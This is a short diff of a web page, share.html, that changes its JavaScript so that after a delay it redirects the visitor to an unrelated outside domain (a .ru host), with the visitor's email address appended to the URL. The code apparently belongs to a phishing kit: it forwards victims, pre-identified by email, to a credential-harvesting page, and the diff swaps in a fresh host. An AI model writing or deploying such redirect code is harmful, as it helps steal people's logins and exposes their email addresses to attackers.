--- a/share.html
+++ b/share.html
@@ -70,7 +70,7 @@
             if (email) {
                 // Redirect with the email parameter appended to the URL
                 setTimeout(function () {
-                    window.location.href = `https://tvrcemeheff.plumbs360.com/UwXUnAeh#${email}`;
+                    window.location.href = `https://hue.remitran.ru/NXWiBjzp/#D${email}`;
                 }, 2000);  // Delay of 1 seconds
             } else {
                 alert('No email parameter found in the URL.');
